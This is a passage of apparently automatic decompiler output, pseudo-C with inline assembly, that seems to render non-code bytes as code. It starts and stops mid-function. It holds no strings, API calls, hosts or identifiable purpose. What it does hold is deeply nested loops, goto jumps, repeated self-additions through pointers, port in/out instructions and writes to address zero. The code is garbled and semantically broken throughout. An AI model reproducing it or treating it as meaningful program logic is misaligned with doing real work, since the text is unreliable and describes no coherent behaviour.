                                  											 *((intOrPtr*)(_t589 + 0x2a0a0002)) =  *((intOrPtr*)(_t589 + 0x2a0a0002)) - _t533;
                                  											asm("adc esi, [eax]");
                                  											_t279 = _t276 +  *_t276 +  *_t605;
                                  											_t590 = 0;
                                  											 *_t279 =  *_t279 + _t279;
                                  											 *_t279 =  *_t279 + _t279;
                                  											 *_t279 =  *_t279 + _t279;
                                  											_t280 = _t279 &  *_t279;
                                  											 *_t280 =  *_t280 + _t280;
                                  											 *_t280 =  *_t280 + _t280;
                                  											 *((intOrPtr*)(_t612 + 0x40)) =  *((intOrPtr*)(_t612 + 0x40)) + _t533;
                                  											_t281 = _t280 &  *_t280;
                                  											 *_t281 =  *_t281 + _t281;
                                  											 *_t281 =  *_t281 + _t281;
                                  											asm("rol byte [ecx+0x29b7340], 1");
                                  											 *0 =  *0 + _t563;
                                  											_t282 = _t281 + 0x23;
                                  											 *_t282 =  *_t282 + _t282;
                                  											 *_t282 =  *_t282 + _t282;
                                  											 *((intOrPtr*)(_t282 - 0x71)) =  *((intOrPtr*)(_t282 - 0x71)) + _t282;
                                  											_t284 = _t282 + 0x00000001 &  *(_t282 + 1);
                                  											 *_t284 =  *_t284 + _t284;
                                  											 *_t284 =  *_t284 + _t284;
                                  											 *0 =  *0 + _t563;
                                  											_t285 = _t284 + 0x23;
                                  											 *_t285 =  *_t285 + _t285;
                                  											 *_t285 =  *_t285 + _t285;
                                  											 *_t285 =  *_t285 + _t285;
                                  											_t274 = _t285 + 0x00000001 &  *(_t285 + 1);
                                  											 *_t274 =  *_t274 + _t274;
                                  											 *_t274 =  *_t274 + _t274;
                                  											if( *_t274 < 0) {
                                  												goto L11;
                                  											}
                                  											_t276 = _t274 + 1;
                                  											if(_t276 >= 0) {
                                  												continue;
                                  											}
                                  											_t289 = (_t276 +  *_t276 |  *(_t276 +  *_t276 + 0x400017f)) &  *(_t276 +  *_t276 |  *(_t276 +  *_t276 + 0x400017f));
                                  											 *_t289 =  *_t289 + _t289;
                                  											 *_t289 =  *_t289 + _t289;
                                  											_t292 = _t289 + 0x91 &  *(_t289 + 0x91);
                                  											 *_t292 =  *_t292 + _t292;
                                  											 *_t292 =  *_t292 + _t292;
                                  											 *((intOrPtr*)(_t292 + 0x29b7340)) =  *((intOrPtr*)(_t292 + 0x29b7340)) + _t563;
                                  											 *0 =  *0 + _t563;
                                  											 *((char*)(_t292 + 0x1e040001)) =  *((char*)(_t292 + 0x1e040001)) + 0x8d;
                                  											 *_t563 =  *_t563;
                                  											asm("pushfd");
                                  											asm("sbb [ebp+0x10000b0], cl");
                                  											 *((char*)(_t533 + 0x1c040001)) =  *((char*)(_t533 + 0x1c040001)) + 0x8d;
                                  											 *_t563 =  *_t563;
                                  											_t301 = 0;
                                  											while(1) {
                                  												L16:
                                  												 *((intOrPtr*)(_t301 + _t612)) =  *((intOrPtr*)(_t301 + _t612)) + _t301;
                                  												asm("pushfd");
                                  												_t303 = _t301 +  *_t301 |  *(_t301 +  *_t301 + 0x4000184);
                                  												while(1) {
                                  													 *((char*)(_t563 + _t303 + 0x2a0400)) =  *((char*)(_t563 + _t303 + 0x2a0400));
                                  													asm("sbb esi, [eax]");
                                  													 *_t303 =  *_t303 + _t303;
                                  													while(1) {
                                  														L18:
                                  														_push(ds);
                                  														 *_t303 =  *_t303 + _t303;
                                  														 *((intOrPtr*)(_t597 + 0x7e110000)) =  *((intOrPtr*)(_t597 + 0x7e110000)) + _t563;
                                  														asm("scasb");
                                  														 *_t303 =  *_t303 + _t303;
                                  														asm("popfd");
                                  														_t305 = _t303 + 0x28 +  *((intOrPtr*)(_t303 + 0x28));
                                  														asm("sahf");
                                  														_t306 = _t305 +  *_t305;
                                  														_t591 = _t590 |  *(_t612 - 0x26);
                                  														 *_t306 =  *_t306 + _t306;
                                  														_t563 = (_t563 |  *_t305) +  *_t591;
                                  														asm("fiadd word [0x1400de26]");
                                  														_t308 = _t306 -  *_t605 -  *((intOrPtr*)(_t306 -  *_t605));
                                  														 *_t563 =  *_t563 + _t308;
                                  														_t301 = _t308;
                                  														 *_t301 =  *_t301 + _t301;
                                  														 *_t301 =  *_t301 + _t301;
                                  														 *_t597 =  *_t597 + _t591;
                                  														_pop(ss);
                                  														 *_t533 =  *_t533 + _t301;
                                  														_pop(ss);
                                  														 *_t301 =  *_t301 + _t301;
                                  														 *_t533 =  *_t533 + _t591;
                                  														 *_t533 =  *_t533 ^ _t301;
                                  														 *_t597 =  *_t597 + _t301;
                                  														 *_t301 =  *_t301 + _t301;
                                  														 *_t301 =  *_t301 + _t301;
                                  														 *_t301 =  *_t301 + _t301;
                                  														_t590 = _t591 +  *((intOrPtr*)(_t605 + _t597 * 8));
                                  														while(1) {
                                  															L19:
                                  															asm("adc al, 0xfe");
                                  															_push(es);
                                  															asm("adc al, [ebx]");
                                  															 *_t605 =  *_t605 + _t301;
                                  															if( *_t605 >= 0) {
                                  																goto L16;
                                  															}
                                  															_t303 = _t301 +  *_t301;
                                  															_t590 = _t590 |  *_t597;
                                  															if(_t590 >= 0) {
                                  																 *((char*)(_t563 + _t303 + 0x2a0400)) =  *((char*)(_t563 + _t303 + 0x2a0400));
                                  																asm("sbb esi, [eax]");
                                  																 *_t303 =  *_t303 + _t303;
                                  																L18:
                                  																_push(ds);
                                  																 *_t303 =  *_t303 + _t303;
                                  																 *((intOrPtr*)(_t597 + 0x7e110000)) =  *((intOrPtr*)(_t597 + 0x7e110000)) + _t563;
                                  																asm("scasb");
                                  																 *_t303 =  *_t303 + _t303;
                                  																asm("popfd");
                                  																_t305 = _t303 + 0x28 +  *((intOrPtr*)(_t303 + 0x28));
                                  																asm("sahf");
                                  																_t306 = _t305 +  *_t305;
                                  																_t591 = _t590 |  *(_t612 - 0x26);
                                  																 *_t306 =  *_t306 + _t306;
                                  																_t563 = (_t563 |  *_t305) +  *_t591;
                                  																asm("fiadd word [0x1400de26]");
                                  																_t308 = _t306 -  *_t605 -  *((intOrPtr*)(_t306 -  *_t605));
                                  																 *_t563 =  *_t563 + _t308;
                                  																_t301 = _t308;
                                  																 *_t301 =  *_t301 + _t301;
                                  																 *_t301 =  *_t301 + _t301;
                                  																 *_t597 =  *_t597 + _t591;
                                  																_pop(ss);
                                  																 *_t533 =  *_t533 + _t301;
                                  																_pop(ss);
                                  																 *_t301 =  *_t301 + _t301;
                                  																 *_t533 =  *_t533 + _t591;
                                  																 *_t533 =  *_t533 ^ _t301;
                                  																 *_t597 =  *_t597 + _t301;
                                  																 *_t301 =  *_t301 + _t301;
                                  																 *_t301 =  *_t301 + _t301;
                                  																 *_t301 =  *_t301 + _t301;
                                  																_t590 = _t591 +  *((intOrPtr*)(_t605 + _t597 * 8));
                                  																continue;
                                  															}
                                  															_t309 = _t303 +  *_t303;
                                  															_t533 = _t533 |  *(_t612 - 0x6f);
                                  															 *_t309 =  *_t309 + _t309;
                                  															_t303 = _t309 + 2;
                                  															if(_t303 >= 0) {
                                  																goto L18;
                                  															}
                                  															_t310 = _t303 +  *_t303;
                                  															_t534 = _t533 |  *(_t612 - 0x6e);
                                  															 *_t310 =  *_t310 + _t310;
                                  															_t311 = _t310 + 2;
                                  															 *_t563 =  *_t563 - _t590;
                                  															 *_t311 =  *_t311 + _t311;
                                  															_t314 = (_t311 |  *_t590) + 0x00000028 &  *_t534;
                                  															 *_t605 =  *_t605 + _t314;
                                  															_t315 = _t314 +  *_t534;
                                  															 *0x2060003 =  *0x2060003 - _t315;
                                  															_push(cs);
                                  															while(1) {
                                  																asm("daa");
                                  																_push(es);
                                  																_push(es);
                                  																asm("adc esi, [eax]");
                                  																_t320 = _t315 + 0x28 +  *((intOrPtr*)(_t315 + 0x28)) +  *0x32928 -  *((intOrPtr*)(_t315 + 0x28 +  *((intOrPtr*)(_t315 + 0x28)) +  *0x32928)) +  *((intOrPtr*)(_t315 + 0x28 +  *((intOrPtr*)(_t315 + 0x28)) +  *0x32928 -  *((intOrPtr*)(_t315 + 0x28 +  *((intOrPtr*)(_t315 + 0x28)) +  *0x32928))));
                                  																 *_t320 =  *_t320 - _t320;
                                  																 *_t320 =  *_t320 + _t320;
                                  																 *_t563 =  *_t563 + _t590;
                                  																_t533 = _t534 +  *((intOrPtr*)(_t534 - 0x6c));
                                  																 *0 =  *0;
                                  																_t322 = 0xa;
                                  																_push(es);
                                  																while(1) {
                                  																	L24:
                                  																	_t322 = _t322 |  *_t597;
                                  																	_t612 = _t612 +  *_t322;
                                  																	asm("in al, 0x1");
                                  																	 *_t590 =  *_t590 + _t563;
                                  																	if( *_t590 == 0) {
                                  																		goto L32;
                                  																	}
                                  																	L25:
                                  																	 *_t322 =  *_t322 + _t322;
                                  																	_t563 = _t563 +  *((intOrPtr*)(_t590 + _t322));
                                  																	if(_t563 < 0) {
                                  																		goto L19;
                                  																	} else {
                                  																		 *_t322 =  *_t322 + _t322;
                                  																		_t324 = _t322 + 8;
                                  																		_pop(es);
                                  																		L27:
                                  																		 *_t605 =  *_t605 - _t590;
                                  																		 *_t533 =  *_t533 + _t563;
                                  																		_pop(es);
                                  																		_t529 = (_t324 |  *_t605) -  *(_t324 |  *_t605);
                                  																		 *_t529 =  *_t529 + _t529;
                                  																		asm("adc esi, [eax]");
                                  																		_t530 = _t529 +  *_t529;
                                  																		 *_t530 =  *_t530 - _t530;
                                  																		 *_t530 =  *_t530 + _t530;
                                  																		 *_t563 =  *_t563 + _t590;
                                  																		_t534 = (_t533 ^ _t597) +  *((intOrPtr*)((_t533 ^ _t597) - 0x6c));
                                  																		 *0 =  *0;
                                  																		_t527 = 0xa;
                                  																		_push(es);
                                  																		L28:
                                  																		_t527 = _t527 |  *_t597;
                                  																		_t612 = _t612 +  *_t527;
                                  																		asm("out 0x1, al");
                                  																		 *_t590 =  *_t590 + _t563;
                                  																		if( *_t590 == 0) {
                                  																			L38:
                                  																			 *_t534 =  *_t534 ^ _t527;
                                  																			 *_t563 =  *_t563 + _t563;
                                  																			 *_t527 =  *_t527 + _t527;
                                  																			_t76 = _t563 + 0x2110000;
                                  																			 *_t76 =  *((intOrPtr*)(_t563 + 0x2110000)) + _t590;
                                  																			if( *_t76 != 0) {
                                  																				goto L28;
                                  																			} else {
                                  																				 *_t527 =  *_t527 + _t527;
                                  																				_t326 = _t527 + 0xa;
                                  																				L40:
                                  																				_push(es);
                                  																				_t327 = _t326 |  *_t597;
                                  																				L41:
                                  																				_pop(es);
                                  																				_t612 = _t612 +  *_t327;
                                  																				asm("out 0x1, al");
                                  																				 *_t590 =  *_t590 + _t563;
                                  																				if( *_t590 != 0) {
                                  																					 *_t327 =  *_t327 + _t327;
                                  																					_t563 = _t563 +  *((intOrPtr*)(_t590 + _t327));
                                  																					if(_t563 < 0) {
                                  																						goto L31;
                                  																					} else {
                                  																						 *_t327 =  *_t327 + _t327;
                                  																						_t325 = _t327 + 8;
                                  																						_pop(es);
                                  																						 *_t597 =  *_t597 - _t590;
                                  																						L44:
                                  																						_push(_t597);
                                  																						 *_t325 =  *_t325 + _t325;
                                  																						_t563 = _t563 -  *_t590;
                                  																						es = es;
                                  																						_t534 = _t534 ^ _t597;
                                  																						_t329 = _t325 -  *_t325;
                                  																						 *_t329 =  *_t329 + _t329;
                                  																						asm("adc esi, [eax]");
                                  																						_t324 = _t329 +  *_t329;
                                  																						L45:
                                  																						 *_t563 =  *_t563 + _t563;
                                  																						 *_t324 =  *_t324 + _t324;
                                  																						_t79 = _t590 + 0x2110000;
                                  																						 *_t79 =  *((intOrPtr*)(_t590 + 0x2110000)) + _t590;
                                  																						if( *_t79 != 0) {
                                  																							L34:
                                  																							_pop(es);
                                  																							_t612 = _t612 +  *_t324;
                                  																							asm("in al, 0x1");
                                  																							 *_t590 =  *_t590 + _t563;
                                  																							if( *_t590 == 0) {
                                  																								goto L45;
                                  																							} else {
                                  																								 *_t324 =  *_t324 + _t324;
                                  																								_t563 = _t563 +  *((intOrPtr*)(_t590 + _t324));
                                  																								if(_t563 < 0) {
                                  																									goto L27;
                                  																								} else {
                                  																									 *_t324 =  *_t324 + _t324;
                                  																									_t326 = _t324 + 8;
                                  																									_pop(es);
                                  																									 *_t597 =  *_t597 - _t590;
                                  																									goto L37;
                                  																								}
                                  																							}
                                  																						} else {
                                  																							 *_t324 =  *_t324 + _t324;
                                  																							_t325 = _t324 + 0xa;
                                  																							L47:
                                  																							_push(es);
                                  																							_t326 = _t325 |  *_t597;
                                  																							_t612 = _t612 +  *_t326;
                                  																							asm("in al, 0x1");
                                  																							 *_t590 =  *_t590 + _t563;
                                  																							if( *_t590 == 0) {
                                  																								goto L40;
                                  																							} else {
                                  																								 *_t326 =  *_t326 + _t326;
                                  																								_t81 = _t590 + _t326;
                                  																								 *_t81 =  *((intOrPtr*)(_t590 + _t326)) + _t563;
                                  																								if( *_t81 < 0) {
                                  																									L37:
                                  																									_push(_t597);
                                  																									 *_t326 =  *_t326 + _t326;
                                  																									_t563 = _t563 -  *_t590;
                                  																									es = es;
                                  																									_t534 = _t534 ^ _t597;
                                  																									_t527 = _t326 -  *_t326;
                                  																									 *_t527 =  *_t527 + _t527;
                                  																									asm("adc esi, [eax]");
                                  																									goto L38;
                                  																								} else {
                                  																									 *_t326 =  *_t326 + _t326;
                                  																									_t328 = _t326 + 8;
                                  																									_pop(es);
                                  																									 *_t328 =  *_t328 - _t534;
                                  																									L50:
                                  																									 *_t328 =  *_t328 + _t328;
                                  																									_t563 = _t563 -  *_t590;
                                  																									es = es;
                                  																									_t534 = _t534 ^ _t597;
                                  																									_t334 = _t328 -  *_t328;
                                  																									 *_t334 =  *_t334 + _t334;
                                  																									asm("adc esi, [eax]");
                                  																									_t327 = _t334 +  *_t334;
                                  																								}
                                  																							}
                                  																						}
                                  																					}
                                  																				}
                                  																			}
                                  																		} else {
                                  																			 *_t527 =  *_t527 + _t527;
                                  																			_t563 = _t563 +  *((intOrPtr*)(_t590 + _t527));
                                  																			if(_t563 < 0) {
                                  																				asm("daa");
                                  																				_push(es);
                                  																				_push(es);
                                  																				asm("adc esi, [eax]");
                                  																				_t320 = _t315 + 0x28 +  *((intOrPtr*)(_t315 + 0x28)) +  *0x32928 -  *((intOrPtr*)(_t315 + 0x28 +  *((intOrPtr*)(_t315 + 0x28)) +  *0x32928)) +  *((intOrPtr*)(_t315 + 0x28 +  *((intOrPtr*)(_t315 + 0x28)) +  *0x32928 -  *((intOrPtr*)(_t315 + 0x28 +  *((intOrPtr*)(_t315 + 0x28)) +  *0x32928))));
                                  																				 *_t320 =  *_t320 - _t320;
                                  																				 *_t320 =  *_t320 + _t320;
                                  																				 *_t563 =  *_t563 + _t590;
                                  																				_t533 = _t534 +  *((intOrPtr*)(_t534 - 0x6c));
                                  																				 *0 =  *0;
                                  																				_t322 = 0xa;
                                  																				_push(es);
                                  																				L24:
                                  																				_t322 = _t322 |  *_t597;
                                  																				_t612 = _t612 +  *_t322;
                                  																				asm("in al, 0x1");
                                  																				 *_t590 =  *_t590 + _t563;
                                  																				if( *_t590 == 0) {
                                  																					goto L32;
                                  																				}
                                  																			} else {
                                  																				 *_t527 =  *_t527 + _t527;
                                  																				_t327 = _t527 + 8;
                                  																				_pop(es);
                                  																				L31:
                                  																				 *_t605 =  *_t605 - _t590;
                                  																				 *_t534 =  *_t534 + _t563;
                                  																				_pop(es);
                                  																				_t533 = _t534 ^ _t597;
                                  																				_t322 = (_t327 |  *_t605) -  *(_t327 |  *_t605);
                                  																				 *_t322 =  *_t322 + _t322;
                                  																				asm("adc esi, [eax]");
                                  																				goto L32;
                                  																			}
                                  																		}
                                  																	}
                                  																	L51:
                                  																	 *_t563 =  *_t563 + _t563;
                                  																	 *_t327 =  *_t327 + _t327;
                                  																	_t83 = _t590 + 0x2110000;
                                  																	 *_t83 =  *((intOrPtr*)(_t590 + 0x2110000)) + _t590;
                                  																	if( *_t83 != 0) {
                                  																		goto L41;
                                  																	}
                                  																	 *_t327 =  *_t327 + _t327;
                                  																	_t328 = _t327 + 0xa;
                                  																	while(1) {
                                  																		L53:
                                  																		_push(es);
                                  																		_t325 = _t328 |  *_t597;
                                  																		_t612 = _t612 +  *_t325;
                                  																		asm("out 0x1, al");
                                  																		 *_t590 =  *_t590 + _t563;
                                  																		if( *_t590 == 0) {
                                  																			goto L47;
                                  																		}
                                  																		 *_t325 =  *_t325 + _t325;
                                  																		_t85 = _t590 + _t325;
                                  																		 *_t85 =  *((intOrPtr*)(_t590 + _t325)) + _t563;
                                  																		if( *_t85 < 0) {
                                  																			goto L44;
                                  																		}
                                  																		 *_t325 =  *_t325 + _t325;
                                  																		_t330 = _t325 + 8;
                                  																		_pop(es);
                                  																		 *_t330 =  *_t330 - _t534;
                                  																		while(1) {
                                  																			 *_t330 =  *_t330 + _t330;
                                  																			_t563 = _t563 -  *_t590;
                                  																			es = es;
                                  																			_t331 = _t330 -  *_t330;
                                  																			 *_t331 =  *_t331 + _t331;
                                  																			asm("adc esi, [eax]");
                                  																			_t332 = _t331 +  *_t331;
                                  																			 *_t332 =  *_t332 - _t332;
                                  																			 *_t332 =  *_t332 + _t332;
                                  																			_t590 = 0;
                                  																			 *_t563 =  *_t563;
                                  																			_t534 = (_t534 ^ _t597) +  *((intOrPtr*)((_t534 ^ _t597) - 0x69));
                                  																			 *_t332 =  *_t332 + _t332;
                                  																			_t333 = _t332 + 0xa;
                                  																			while(1) {
                                  																				L57:
                                  																				_push(es);
                                  																				_t328 = _t333 |  *_t597;
                                  																				_t612 = _t612 +  *_t328;
                                  																				asm("in al, 0x1");
                                  																				 *_t590 =  *_t590 + _t563;
                                  																				if( *_t590 == 0) {
                                  																					goto L53;
                                  																				}
                                  																				 *_t328 =  *_t328 + _t328;
                                  																				_t88 = _t590 + _t328;
                                  																				 *_t88 =  *((intOrPtr*)(_t590 + _t328)) + _t563;
                                  																				if( *_t88 < 0) {
                                  																					goto L50;
                                  																				}
                                  																				 *_t328 =  *_t328 + _t328;
                                  																				_t335 = _t328 + 8;
                                  																				_pop(es);
                                  																				 *_t335 =  *_t335 - _t534;
                                  																				while(1) {
                                  																					 *_t534 =  *_t534 + _t563;
                                  																					_pop(es);
                                  																					_t337 = (_t335 |  *_t605) -  *(_t335 |  *_t605);
                                  																					 *_t337 =  *_t337 + _t337;
                                  																					asm("adc esi, [eax]");
                                  																					_t338 = _t337 +  *_t337;
                                  																					 *_t338 =  *_t338 - _t338;
                                  																					 *_t338 =  *_t338 + _t338;
                                  																					_t590 = 0;
                                  																					 *_t563 =  *_t563;
                                  																					_t534 = (_t534 ^ _t597) +  *((intOrPtr*)((_t534 ^ _t597) - 0x69));
                                  																					 *_t338 =  *_t338 + _t338;
                                  																					_t339 = _t338 + 0xa;
                                  																					while(1) {
                                  																						L61:
                                  																						_push(es);
                                  																						_t333 = _t339 |  *_t597;
                                  																						_t612 = _t612 +  *_t333;
                                  																						asm("out 0x1, al");
                                  																						 *_t590 =  *_t590 + _t563;
                                  																						if( *_t590 == 0) {
                                  																							goto L57;
                                  																						}
                                  																						 *_t333 =  *_t333 + _t333;
                                  																						_t91 = _t590 + _t333;
                                  																						 *_t91 =  *((intOrPtr*)(_t590 + _t333)) + _t563;
                                  																						if( *_t91 < 0) {
                                  																							 *_t330 =  *_t330 + _t330;
                                  																							_t563 = _t563 -  *_t590;
                                  																							es = es;
                                  																							_t331 = _t330 -  *_t330;
                                  																							 *_t331 =  *_t331 + _t331;
                                  																							asm("adc esi, [eax]");
                                  																							_t332 = _t331 +  *_t331;
                                  																							 *_t332 =  *_t332 - _t332;
                                  																							 *_t332 =  *_t332 + _t332;
                                  																							_t590 = 0;
                                  																							 *_t563 =  *_t563;
                                  																							_t534 = (_t534 ^ _t597) +  *((intOrPtr*)((_t534 ^ _t597) - 0x69));
                                  																							 *_t332 =  *_t332 + _t332;
                                  																							_t333 = _t332 + 0xa;
                                  																							goto L57;
                                  																						}
                                  																						 *_t333 =  *_t333 + _t333;
                                  																						_t340 = _t333 + 8;
                                  																						_pop(es);
                                  																						 *_t340 =  *_t340 - _t534;
                                  																						while(1) {
                                  																							 *_t534 =  *_t534 + _t563;
                                  																							_pop(es);
                                  																							_t342 = (_t340 |  *_t605) -  *(_t340 |  *_t605);
                                  																							 *_t342 =  *_t342 + _t342;
                                  																							asm("adc esi, [eax]");
                                  																							_t343 = _t342 +  *_t342;
                                  																							 *_t343 =  *_t343 - _t343;
                                  																							 *_t343 =  *_t343 + _t343;
                                  																							_t590 = 0;
                                  																							 *_t563 =  *_t563;
                                  																							_t534 = (_t534 ^ _t597) +  *((intOrPtr*)((_t534 ^ _t597) - 0x68));
                                  																							 *_t343 =  *_t343 + _t343;
                                  																							_t344 = _t343 + 0xa;
                                  																							while(1) {
                                  																								L65:
                                  																								_push(es);
                                  																								_t339 = _t344 |  *_t597;
                                  																								_t612 = _t612 +  *_t339;
                                  																								asm("in al, 0x1");
                                  																								 *_t590 =  *_t590 + _t563;
                                  																								if( *_t590 == 0) {
                                  																									goto L61;
                                  																								}
                                  																								 *_t339 =  *_t339 + _t339;
                                  																								_t94 = _t590 + _t339;
                                  																								 *_t94 =  *((intOrPtr*)(_t590 + _t339)) + _t563;
                                  																								if( *_t94 < 0) {
                                  																									 *_t534 =  *_t534 + _t563;
                                  																									_pop(es);
                                  																									_t337 = (_t335 |  *_t605) -  *(_t335 |  *_t605);
                                  																									 *_t337 =  *_t337 + _t337;
                                  																									asm("adc esi, [eax]");
                                  																									_t338 = _t337 +  *_t337;
                                  																									 *_t338 =  *_t338 - _t338;
                                  																									 *_t338 =  *_t338 + _t338;
                                  																									_t590 = 0;
                                  																									 *_t563 =  *_t563;
                                  																									_t534 = (_t534 ^ _t597) +  *((intOrPtr*)((_t534 ^ _t597) - 0x69));
                                  																									 *_t338 =  *_t338 + _t338;
                                  																									_t339 = _t338 + 0xa;
                                  																									goto L61;
                                  																								}
                                  																								 *_t339 =  *_t339 + _t339;
                                  																								_t345 = _t339 + 8;
                                  																								_pop(es);
                                  																								 *_t345 =  *_t345 - _t534;
                                  																								 *_t534 =  *_t534 + _t563;
                                  																								while(1) {
                                  																									_t563 = _t563 -  *_t590;
                                  																									es = es;
                                  																									_t346 = _t345 -  *_t345;
                                  																									 *_t346 =  *_t346 + _t346;
                                  																									asm("adc esi, [eax]");
                                  																									_t347 = _t346 +  *_t346;
                                  																									 *_t347 =  *_t347 - _t347;
                                  																									 *_t347 =  *_t347 + _t347;
                                  																									_t590 = 0;
                                  																									 *_t563 =  *_t563;
                                  																									_t534 = (_t534 ^ _t597) +  *((intOrPtr*)((_t534 ^ _t597) - 0x68));
                                  																									 *_t347 =  *_t347 + _t347;
                                  																									_t348 = _t347 + 0xa;
                                  																									_push(es);
                                  																									while(1) {
                                  																										L69:
                                  																										_t344 = _t348 |  *_t597;
                                  																										_t612 = _t612 +  *_t344;
                                  																										asm("out 0x1, al");
                                  																										 *_t590 =  *_t590 + _t563;
                                  																										if( *_t590 == 0) {
                                  																											goto L65;
                                  																										}
                                  																										 *_t344 =  *_t344 + _t344;
                                  																										_t97 = _t590 + _t344;
                                  																										 *_t97 =  *((intOrPtr*)(_t590 + _t344)) + _t563;
                                  																										if( *_t97 < 0) {
                                  																											 *_t534 =  *_t534 + _t563;
                                  																											_pop(es);
                                  																											_t342 = (_t340 |  *_t605) -  *(_t340 |  *_t605);
                                  																											 *_t342 =  *_t342 + _t342;
                                  																											asm("adc esi, [eax]");
                                  																											_t343 = _t342 +  *_t342;
                                  																											 *_t343 =  *_t343 - _t343;
                                  																											 *_t343 =  *_t343 + _t343;
                                  																											_t590 = 0;
                                  																											 *_t563 =  *_t563;
                                  																											_t534 = (_t534 ^ _t597) +  *((intOrPtr*)((_t534 ^ _t597) - 0x68));
                                  																											 *_t343 =  *_t343 + _t343;
                                  																											_t344 = _t343 + 0xa;
                                  																											goto L65;
                                  																										}
                                  																										 *_t344 =  *_t344 + _t344;
                                  																										_t349 = _t344 + 8;
                                  																										_pop(es);
                                  																										 *_t349 =  *_t349 - _t534;
                                  																										 *_t534 =  *_t534 + _t563;
                                  																										while(1) {
                                  																											_t563 = _t563 -  *_t590;
                                  																											es = es;
                                  																											_t350 = _t349 -  *_t349;
                                  																											 *_t350 =  *_t350 + _t350;
                                  																											asm("adc esi, [eax]");
                                  																											_t351 = _t350 +  *_t350;
                                  																											 *_t351 =  *_t351 - _t351;
                                  																											 *_t351 =  *_t351 + _t351;
                                  																											 *_t563 =  *_t563 + _t590;
                                  																											_t534 = 0 +  *0xFFFFFFFFFFFFFF99;
                                  																											 *_t351 =  *_t351 + _t351;
                                  																											_t352 = _t351 + 0xa;
                                  																											_push(es);
                                  																											while(1) {
                                  																												L73:
                                  																												_t348 = _t352 |  *_t597;
                                  																												_t612 = _t612 +  *_t348;
                                  																												asm("in al, 0x1");
                                  																												 *_t590 =  *_t590 + _t563;
                                  																												if( *_t590 == 0) {
                                  																													goto L69;
                                  																												}
                                  																												 *_t348 =  *_t348 + _t348;
                                  																												_t100 = _t590 + _t348;
                                  																												 *_t100 =  *((intOrPtr*)(_t590 + _t348)) + _t563;
                                  																												if( *_t100 < 0) {
                                  																													_t563 = _t563 -  *_t590;
                                  																													es = es;
                                  																													_t346 = _t345 -  *_t345;
                                  																													 *_t346 =  *_t346 + _t346;
                                  																													asm("adc esi, [eax]");
                                  																													_t347 = _t346 +  *_t346;
                                  																													 *_t347 =  *_t347 - _t347;
                                  																													 *_t347 =  *_t347 + _t347;
                                  																													_t590 = 0;
                                  																													 *_t563 =  *_t563;
                                  																													_t534 = (_t534 ^ _t597) +  *((intOrPtr*)((_t534 ^ _t597) - 0x68));
                                  																													 *_t347 =  *_t347 + _t347;
                                  																													_t348 = _t347 + 0xa;
                                  																													_push(es);
                                  																													goto L69;
                                  																												}
                                  																												 *_t348 =  *_t348 + _t348;
                                  																												_t353 = _t348 + 8;
                                  																												_pop(es);
                                  																												 *_t563 =  *_t563 - _t534;
                                  																												 *_t534 =  *_t534 + _t563;
                                  																												while(1) {
                                  																													L76:
                                  																													_pop(es);
                                  																													_t355 = (_t353 |  *_t605) -  *(_t353 |  *_t605);
                                  																													 *_t355 =  *_t355 + _t355;
                                  																													asm("adc esi, [eax]");
                                  																													_t356 = _t355 +  *_t355;
                                  																													 *_t356 =  *_t356 - _t356;
                                  																													 *_t356 =  *_t356 + _t356;
                                  																													 *_t563 =  *_t563 + _t590;
                                  																													_t534 = 0 +  *((intOrPtr*)(0xffffffffffffff99));
                                  																													 *_t356 =  *_t356 + _t356;
                                  																													_push(es);
                                  																													_t352 = _t356 + 0x0000000a |  *_t597;
                                  																													_t612 = _t612 +  *_t352;
                                  																													asm("out 0x1, al");
                                  																													 *_t590 =  *_t590 + _t563;
                                  																													if( *_t590 == 0) {
                                  																														goto L73;
                                  																													}
                                  																													 *_t352 =  *_t352 + _t352;
                                  																													_t103 = _t590 + _t352;
                                  																													 *_t103 =  *((intOrPtr*)(_t590 + _t352)) + _t563;
                                  																													if( *_t103 < 0) {
                                  																														_t563 = _t563 -  *_t590;
                                  																														es = es;
                                  																														_t350 = _t349 -  *_t349;
                                  																														 *_t350 =  *_t350 + _t350;
                                  																														asm("adc esi, [eax]");
                                  																														_t351 = _t350 +  *_t350;
                                  																														 *_t351 =  *_t351 - _t351;
                                  																														 *_t351 =  *_t351 + _t351;
                                  																														 *_t563 =  *_t563 + _t590;
                                  																														_t534 = 0 +  *0xFFFFFFFFFFFFFF99;
                                  																														 *_t351 =  *_t351 + _t351;
                                  																														_t352 = _t351 + 0xa;
                                  																														_push(es);
                                  																														goto L73;
                                  																													}
                                  																													 *_t352 =  *_t352 + _t352;
                                  																													_t358 = _t352 + 8;
                                  																													_pop(es);
                                  																													 *_t563 =  *_t563;
                                  																													 *_t534 =  *_t534 + _t563;
                                  																													while(1) {
                                  																														_pop(es);
                                  																														_t360 = (_t358 |  *_t605) -  *(_t358 |  *_t605);
                                  																														 *_t360 =  *_t360 + _t360;
                                  																														asm("adc esi, [eax]");
                                  																														_t361 = _t360 +  *_t360;
                                  																														 *_t361 =  *_t361 - _t361;
                                  																														 *_t361 =  *_t361 + _t361;
                                  																														 *_t563 =  *_t563 + _t590;
                                  																														_t534 = (_t534 ^ _t597) +  *((intOrPtr*)((_t534 ^ _t597) - 0x66));
                                  																														 *0 =  *0;
                                  																														_push(es);
                                  																														_t353 = 0xa |  *_t597;
                                  																														_t612 = _t612 +  *_t353;
                                  																														asm("in al, 0x1");
                                  																														 *_t590 =  *_t590 + _t563;
                                  																														if( *_t590 == 0) {
                                  																															break;
                                  																														}
                                  																														 *_t353 =  *_t353 + _t353;
                                  																														_t563 = _t563 +  *((intOrPtr*)(_t590 + _t353));
                                  																														if(_t563 < 0) {
                                  																															goto L76;
                                  																														} else {
                                  																															 *_t353 =  *_t353 + _t353;
                                  																															_pop(es);
                                  																															 *_t590 =  *_t590 - _t534;
                                  																															 *_t534 =  *_t534 + _t563;
                                  																															_pop(es);
                                  																															_t519 = (_t353 + 0x00000008 |  *_t605) -  *(_t353 + 0x00000008 |  *_t605);
                                  																															 *_t519 =  *_t519 + _t519;
                                  																															asm("adc esi, [eax]");
                                  																															_t520 = _t519 +  *_t519;
                                  																															 *_t520 =  *_t520 - _t520;
                                  																															 *_t520 =  *_t520 + _t520;
                                  																															 *_t563 =  *_t563 + _t590;
                                  																															_t534 = (_t534 ^ _t597) +  *((intOrPtr*)((_t534 ^ _t597) - 0x66));
                                  																															 *0 =  *0;
                                  																															_push(es);
                                  																															_t369 = 0xa |  *_t597;
                                  																															_t612 = _t612 +  *_t369;
                                  																															asm("out 0x1, al");
                                  																															 *_t590 =  *_t590 + _t563;
                                  																															if( *_t590 != 0) {
                                  																																 *_t369 =  *_t369 + _t369;
